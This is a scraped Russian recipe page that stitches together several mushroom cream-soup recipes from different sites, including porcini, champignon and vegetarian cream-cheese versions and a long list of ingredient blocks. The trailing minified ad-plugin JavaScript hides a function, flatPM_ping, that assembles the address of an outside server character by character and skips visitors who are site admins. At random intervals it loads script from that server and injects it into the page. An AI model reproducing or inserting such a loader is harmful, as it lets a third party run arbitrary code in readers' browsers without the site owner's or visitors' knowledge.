Грибной крем-суп

Грибной крем-суп

Этот рецепт сейчас читают: •

Домашний грибной крем-суп из белых грибов — неимоверно ароматное первое блюдо, с удивительным вкусом. Прекрасно подходит для хорошего обеда. Пошаговый рецепт с фото

Домашний густой грибной крем-суп — это один из доступных вариантов приготовления простого и легкого супа для обеда. В сезон, когда массово собираются белые грибы, такой суп можно приготовить из только что собранных грибов, которые пахнут лесом. Зимой, особенно в грибной год, для супа можно использовать замороженные сырые или предварительно отваренные грибы.

Чтобы грибной крем-суп получился очень ароматным, лучше использовать сырые грибы, которые отменно сохраняют аромат, даже будучи замороженными. Наряду с обычным грибным супом из белых грибов, отваривание обжаренных грибов с добавлением сливок или фреш-крема, позволяет получить изумительный мягкий и нежный суп, послевкусие которого ощущается еще долго.

Суп можно варить из многих грибов, важно чтобы грибной отвар получался ароматным и вкусным. Дома в сезон мы обязательно готовим суп из лисичек на бульоне из свиных или говяжьих ребер, это уже стало традицией. А белые грибы мы, как правило, сушим, или немного отвариваем, затем замораживаем. Всю зиму можно готовить быструю закуску маринованные белые грибы с чесноком и зеленым луком, или, если есть настроение, можно приготовить удивительно вкусную грибную пиццу.

Из свежих шампиньонов можно приготовить очень вкусный крем-суп, но в этом случае достигнуть вкуса и аромата, который обеспечивают белые грибы, вряд ли удастся. Но, я думаю, стоит попробовать и добавить в крем-суп из шампиньонов для аромата несколько сушеных белых грибов. Тогда суп будет ароматным, вкусным и очень аппетитным.

Учитывая, что грибы очень сложно превратить в пюре, грибной крем-суп будем готовить обжаренных в сливочном масле кусочков, затем отваривать их с добавлением муки. После получения однородного супа, добавим сливки и специи.

Белые грибы — идеально подходят для приготовления «светлых» отваров и супов. Многие считают, что термин «белый» гриб возник очень давно, и так называли любые съедобные грибы. Возможно и так, но стоит учесть, что белые грибы не темнеют во время отваривания, сохраняя свой изумительный первоначальный цвет. И даже после обжарки белые грибы оставляют в бульоне приятный светлый оттенок.

Грибной крем-суп. Пошаговый рецепт

Ингредиенты (2 порции)

  • Белые грибы 200 г
  • Сливочное масло 1 ст. л.
  • Жирные сливки 0.5 стакана
  • Ржаной хлеб 100 г
  • Пшеничная мука 1 ст. л.
  • Оливковое масло 1 ч. л.
  • Соль, черный перец специи
  1. Свежие белые грибы тщательно вымыть от остатков грунта, хвои и лесного «мусора». Если грибы были заморожены в свежем виде, их лучше не размораживать, а только недолго подержать вне холодильника — 30-40 мин, они утратят твердость и станут по плотности как пенопласт — будут отлично резаться.

    Замороженные белые грибы для супа

    Добавки к супу — сливки, масло и ржаной хлеб

    Приготовить ржаные сухарики

    Обжарить белые грибы на сливочном масле

    Посыпать грибы мукой и перемешать

    Добавить горячую воду и варить суп 10 мин

    Влить сливки и варить суп до готовности

    Дать готовому суп немного постоять

    Домашний грибной крем-суп из белых грибов — удивительное и вкусное первое блюдо

    Если вам понравился мой рецепт — пожалуйста, поделитесь с друзьями:

    Суп-пюре грибной: как готовить по классическому рецепту

    Здравствуйте, дорогие читатели! Закройте глаза и представьте, что вы находитесь в осеннем лесу. Вдохните свежий прохладный воздух и почувствуйте аромат желтеющей травы, хвои и, конечно же, грибов. Именно грибной суп-пюре мы и будем сегодня с вами готовить.

    Супы-пюре имеют приятную текстуру, легко усваиваются организмом, а грибы чрезвычайно богаты белком и имеют крайне низкую калорийность. Поэтому крем-суп, приготовленный из грибов, отлично подходит для диетического питания.

    Блюдо можно приготовить как из свежих грибов, так и из замороженных и сушеных. Мне очень нравится супчик из опят. Они ароматные и вкусные. А собирать их одно удовольствие! Ведь они растут группками. За полчаса можно набрать целую корзину.

    Однако чаще всего для приготовления грибного крем-супа используют шампиньоны, которые доступны в любое время года. К тому же их не надо предварительно отваривать. Приступим к готовке!

    Пошаговый рецепт с фото

    Видеорецепт

    Другие варианты

    • По-французски

    Супы-пюре являются классикой французской кухни. В этих рецептах вы не найдете привычного нам картофеля. Грибной крем-суп по-французски готовится из шампиньонов и лука на курином бульоне с добавлением сливок. Блюдо имеет приятный аромат и нежный сливочный вкус.

    Легко и быстро можно сварить блюдо в мультиварке. Обжарьте овощи с грибами, добавьте к ним воду и готовьте все в режиме “Суп” не более часа. За 10 минут до окончания программы добавьте сливки, соль и перец. По окончании готовки аккуратно измельчите все блендером до пюреобразного состояния. Ароматный и насыщенный суп готов!

    Пикантный вкус придает блюду бекон. Обжарьте его вместе с луком и грибами, затем измельчите все блендером. Если вам такой вариант не по душе, то просто добавьте в тарелку с супом кусочки обжаренного до хрустящей корочки бекона. Получится сытно и вкусно!

    Вместо сухариков, которые традиционно подаются с грибным супом-пюре, подайте сырные гренки. На их приготовление уйдет не более 15 минут. Положите на кусочки багета по ломтику сыра и запекайте в духовке при 150 градусах в течение 10 минут до образования золотистой корочки. Хрустящие гренки с сыром станут отличным дополнением к основному блюду.

    Приятный золотистый оттенок получится у крем-супа, приготовленного из лисичек. Их необходимо отварить перед тем, как начнете готовить супчик. Но не стоит использовать замороженные лисички, так как они могут горчить. Либо отваривайте их перед заморозкой. Так они сохранят свой натуральный вкус. Блюдо подают с зеленью и сметаной. Сухарики в данном случае будут излишними, так как супчик с лисичками получается очень сытным.

    Полезные советы

    1. Вместо свежих шампиньонов можно использовать замороженные. Только обязательно перед началом готовки разморозьте их при комнатной температуре, чтобы слить лишнюю жидкость. Если этого не сделать, то суп получится водянистым. Это касается и лесных замороженных грибов.
    2. Если готовите крем-суп из сухих грибов, то замочите их как минимум на 1 час. Затем тщательно промойте, чтобы избавиться от песка, и отварите до готовности.
    3. Для наваристого бульона возьмите 1 полный стакан сушеных грибов на 3 литра воды.
    4. Сухарики для подачи легко приготовить самостоятельно. Я обычно нарезаю хлеб кубиками, раскладываю на противне в 1 слой, сбрызгиваю оливковым маслом и запекаю в духовке в течение 10 минут при 150 градусах.
    5. Сливки можете выбрать любой жирности, которая вам больше нравится. Если калорийность не имеет для вас большого значения, то выбирайте продукт с более высоким процентом жирности. Так блюдо будет получится более концентрированным.
    6. Будьте осторожны, приправляя блюдо. Грибной суп-пюре имеет очень тонкий аромат, который легко испортить неправильно подобранными специями. Я добавляю в суп щепотку мускатного ореха и белого молотого перца для придания легкой остринки.
    7. Если у вас нет погружного блендера, то можете пюрировать суп в стационарном.

    Заключение

    Сегодня вы узнали, как приготовить ароматный грибной крем-суп по классическому рецепту, из каких грибов его можно приготовить и чем дополнить для усиления вкуса.

    А теперь вперед на кухню готовить и сводить с ума домочадцев сногсшибательным ароматом! Не забудьте рассказать нам в комментариях о своих кулинарных достижениях!

    Грибные супы-пюре

    Мы подготовили для вас самые лучшие рецепты грибных супов-пюре (крем-супов) с пошаговыми фотографиями и подробными инструкциями. Экспериментируйте на здоровье!

    Похожие подборки рецептов

    Упорядочить рецепты по .

    Рецепты супов-пюре (крем-супов) из грибов

    Ингредиенты

    Шампиньоны – 500 г

    Лук репчатый – 2 шт.

    Сливочное масло – 30 г

    Растительное масло – 2-3 ст. л.

    Мука пшеничная – 1,5 ст. л.

    Черный молотый перец – 0,5 ч. л.

    Сухарики – для подачи

    Ингредиенты

    Шампиньоны – 300 г

    Картофель – 400 г

    Сливки (10-20%) – 400 мл.

    Лук репчатый – 1-2 шт.

    Хлеб белый – 5 кусочков

    Масло растительное – 2 ст. л.

    Черный молотый перец – по вкусу

    Ингредиенты

    Шампиньоны – 300 г

    Луковица (большая) – 1 шт.

    Картошка – 300 г

    Плавленый сырок – 2 шт.

    Сливочное масло – 4 ст. л.

    Петрушка – 2 корня

    Масло растительного (для жарки) – 2 ст. л.

    Укроп – по вкусу

    Ингредиенты

    Шампиньоны – 500 г

    Сыр плавленый – 200 г (не перепутайте с сырной продукцией)

    Картофель – 4 шт.

    Мускатный орех – 0,5 ч.л.

    Зелень – 4 веточки

    Масло сливочное – 50 г

    Перец ч/м по вкусу

    Сливки 20% – 200 г

    Ингредиенты

    Шампиньоны – 600 г

    Картофель – 300 г

    Чеснок – 3-4 зубчика

    Растительное масло – 1-2 ст.л.

    Сливочное масло – 1-2 ст.л.

    Мука пшеничная – 1 ст.л. (с горкой)

    Бульон/вода – 0.8-1 л

    Сливки – 100-200 мл

    Перец черный молотый – по вкусу

    Смесь прованских трав/тимьян сушеный – 1-2 ч.л. (по вкусу)

    Петрушка – 0.25 пучка (для подачи)

    Соевый соус – 1-2 ч.л. (по желанию)

    Ингредиенты

    Куриное бедро – 150 г

    Картофель – 1-2 шт.

    Сельдерей – 1 черешок

    Сыр плавленный – 100-150 г

    Зелень – несколько веточек

    Соль и перец ч.м. – по вкусу

    Ингредиенты

    Шампиньоны – 250 г

    Мускатный орех – 5 г

    Сливочное масло – 100 г

    Бульонный кубик – 1 шт.

    Специи – по вкусу

    Зелень – по вкусу

    Ингредиенты

    Шампиньоны – 400 г

    Картофель – 400 г

    Репчатый лук – 1 шт.

    Растительное масло – для обжаривания

    Перец ч.м. – по вкусу

    Ингредиенты

    Шампиньоны свежие – 500 г

    Лук репчатый – 150 г

    Картофель – 200 г

    Сливки 20% – 500 г

    Соль,перец- по вкусу

    Лавровый лист – 2 шт.

    Розмарин свежий – 2 веточки

    Тимьян свежий – 3 веточки

    Вода или бульон – 2 стакана

    Оливковое масло – 2 ст.л.

    Ингредиенты

    Бульон куриный – 1,5 л

    Грибы – 300-400 г

    Картофель (очищенный) – 300 г

    Репчатый лук – 150 г

    Сыр плавленный – 150 г

    Сливочное масло – 50 г

    Перец ч.м. – по вкусу

    Ингредиенты

    Чеснок – 7-8 зубчиков

    Шампиньоны – 200 г

    Лук репчатый – 1 шт.

    Мясной бульон (куриный) – 300 мл

    Булки для бургеров – 2 шт.

    Растительное масло – 1 ст.л.

    Соль и перец – по вкусу

    Ингредиенты

    Лук репчатый – 1 шт.

    Сельдерей черешковый – 4 шт.

    Помидор большой – 1 шт.

    Шампиньоны – 300 г

    Свежая зелень – несколько веточек

    Масло оливковое – 2 ст.л.

    Перец ч.м. – по вкусу

    Сливки 15% – 100 мл

    Ингредиенты

    Картофель – 600 г

    Шампиньоны – 500 г

    Лук репчатый – 2 шт.

    Сливки 10% – 500 мл

    Масло растительное – 2-3 ст.л.

    Приправа из сушеных грибов

    Ингредиенты

    Белые грибы отварные – 150 г

    Картофель – 2 шт.

    Сливки 30% – 100 мл

    Лук репчатый – 1 шт.

    Масло сливочное – 100 г

    Зелень укропа – пучок

    Перец черный молотый – по вкусу

    Ингредиенты

    Куриное мясо – 500 г

    Лук репчатый – 1 шт.

    Сливочное масло – 10 г

    Оливковое масло – 1 ст.л.

    Лавровый лист – 1 шт.

    Картофель – 1 шт.

    Ингредиенты

    Шампиньоны – 500 г

    Патиссоны – 700 г

    Картофель – 200 г

    Чеснок – 2 зубчика

    Соль, перец – по вкусу

    Масло растительное – 3 ст.л.

    Майоран – по вкусу

    Петрушка – по вкусу

    Ингредиенты

    Белые грибы (замороженные) – 400 г

    Картофель – 470 г

    Репчатый лук – 100 г

    Вода (или овощной бульон) – 1-1,2 л

    Сливки (10% или 20%) – 200 мл

    Растительное масло – для обжаривания

    Перец ч. м. – по вкусу

    Ингредиенты

    Грибы мороженые, смесь – 600 г

    Картошка – 400 г

    Лук репчатый – 1 шт.

    Масло растительное – 1 ст.л.

    Ингредиенты

    Шампиньоны – 400 г

    Лук репчатый – 1 шт.

    Картофель – 1-2 шт.

    Сельдерей – 1 черешок

    Зелень – несколько веточек

    Масло растительное – 2 ст.л.

    Перец ч.м. – по вкусу

    Ингредиенты

    Картофель – 5 шт.

    Лук репчатый – 1 шт.

    Грибы сушенные – 25 грамм

    Ингредиенты

    Грибы сухие (в идеале – белые) – 40 г

    Картошка – 300 г

    Растительное масло – 1 ст.л.

    Ингредиенты

    Лисички (замороженные) – 250 г

    Картофель – 150 г

    Вода (или бульон) – 300 мл

    Репчатый лук – 50 г

    Растительное масло – 1-2 ст.л.

    Сливочное масло – 15 г

    Чеснок – 1 средний зубчик

    Сливки (34%) – 200 мл

    Ингредиенты

    Гречка – 1 стакан

    Картофель – 1 шт.

    Шампиньоны – 250 г

    Тимьян, базилик – по вкусу

    Соль, перец – по вкусу

    Растительное масло – 2 ст.л.

    Ингредиенты

    Картофель – 1 шт.

    Шампиньоны – 5 шт.

    Лук репчатый – 1 шт.

    Чеснок – 1 зубчик

    Сливки 20% – 100 мл

    Растительное масло – для жарки

    Перец – по вкусу

    Мускатный орех – на кончике ножа

    Ингредиенты

    ​Свежие шампиньоны – 250 г

    Цветная капуста – 250 г

    Лук репчатый – 1 шт.

    Сливочное масло – 30 г

    Сливки 30% жирности – 100 мл

    Вода (овощной бульон) – 200 мл

    Перец и соль – по вкусу

    Поделитесь подборкой рецептов с друзьями

    АЙМКУК © 2007-2020 год. Все права защищены.
    Использование материалов сайта без письменного разрешения, запрещено законом об Авторских правах Гражданского Кодекса Российской Федерации от 18 декабря 2006 года N 230-ФЗ

    Домашняя кулинария

    Рецепты Инны Жугастровой

    Нежный крем-суп из шампиньонов со сливками и мягким сыром

    Первый крем-суп, который мне довелось попробовать очень давно, в одном рижском кафе, был именно грибной, он меня поразил своей изысканностью, необычностью и нежным сливочным вкусом. Есть в обычном крем-супе из шампиньонов что-то от «высокой кухни». Крем-суп должен быть густым и однородным, с шелковистой гладкой структурой. Крем-суп из шампиньонов со сливками и мягким сыром получается именно таким, идеальным и ароматным. Подборка любимых рецептов протертых супов — по этой ссылке.

    Состав: (на 1 литр воды), 3-4 порции

    • Шампиньоны — 300-400 грамм
    • Лук репчатый — 1 штука
    • Чеснок — 2 зубчика
    • Картофель — 300-400 грамм
    • Морковь — половинка средней морковки, по желанию
    • Сливки 10-20% — 50-100 мл
    • Сливочный или творожный сыр — 2 столовые ложки
    • Растительное (оливковое) масло для обжаривания овощей — 2 столовые ложки
    • Соль, перец по вкусу
    • Сухарики — для украшения

    Как приготовить нежный ароматный грибной крем-суп (суп-пюре) из шампиньонов со сливками

    Крем-суп (суп-пюре) из шампиньонов вегетарианский, готовится на овощном бульоне, его можно включать в меню вегетарианцам, не отказавшимся от молочных продуктов. Для приготовления крем-супа нужен погружной блендер. Заменить его можно, протерев суп через сито, но тогда придется повозиться. Овощи очистить, грибы очень хорошо помыть.

    Очистить, помыть грибы и овощи

    Нарезать морковь и картофель, морковь более мелко.

    Нарезать картофель и морковь

    Залить морковь и картофель 1 литром холодной воды. Довести до кипения и варить до полной готовности овощей — 20-25 минут.

    Варить морковь и картошку до полной готовности

    Мелко нарезать лук и чеснок.

    Мелко нарезать лук, покрошить чеснок

    Нарезать шампиньоны, оставить несколько ломтиков для украшения сливочного крем-супа.

    Нарезать шампиньоны

    Разогреть растительное масло и обжарить лук с чесноком 5 минут.

    Обжарить лук с чесноком до легкой позолоты

    Добавить шампиньоны, выпарить, помешивая, выделившийся сок.

    Добавить грибы, выпарить, помешивая, жидкость

    И тушить на небольшом огне 10-15 минут. (Обжаренные с луком шампиньоны хорошо хранятся в морозилке, я делаю стратегический запас и грибной крем-суп могу приготовить в любой момент, это очень удобно),

    Обжаренные с луком шампиньоны для грибного крем-супа готовы

    Когда морковь и картофель сварятся, слить и сохранить овощной бульон.

    Морковь и картофель для супа готовы

    Соединить овощи с грибами и взбить погружным блендером. Густоту супа-пюре из шампиньонов регулировать, подливая понемногу овощной бульон. Я люблю суп густой, как крем, бульона добавляю капельку, пару столовых ложек.

    Взбить блендером, регулировать густоту добавлением овощного бульона

    Добавить сливки, сливочный или творожный сыр (у меня Hochland).

    Добавить сливки и творожный сыр

    И снова взбить блендером. Посолить, поперчить по вкусу, если у вас есть прекрасная специя, трюфельная соль, самое время ее использовать. Грибной крем-суп из шампиньонов получается нежным как облако и бархатистым по текстуре. Вернуть на огонь и прокипятить 1 минуту.

    Крем-суп из шампиньонов с овощами на овощном бульоне

    Для подачи нарезать хлеб, растереть по сковороде каплю растительного масла и поджарить сухарики-крутоны и ломтики шампиньонов.

    Пожарить крутоны и ломтики шампиньонов для топинга

    Крем-суп из шампиньонов подавать теплым.

    Крем-суп из шампиньонов со сливками, творожным сыром и картофелем

    Каждую порцию крем-супа из шампиньонов украсить топингом, сухариками и ломтиками грибов.

    Грибной крем-суп из шампиньонов со сливками и творожным сыром

    Сливочный крем-суп из шампиньонов со сливками и творожным сыром нежнейшее изысканное обеденное блюдо.

    Нежный сливочный крем-суп с грибами

    Протертые супы-пюре, крем-супы часто подают в хлебе или бутербродных булочках. Если захотите использовать эту эффектную подачу для крем-супа из кабачков, посмотрите как подготовить булочки в рецепте горохового супа-пюре с кореньями.

    Крем-суп из шампиньонов с овощами, сливками и творожным сыром, нежный и ароматный

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};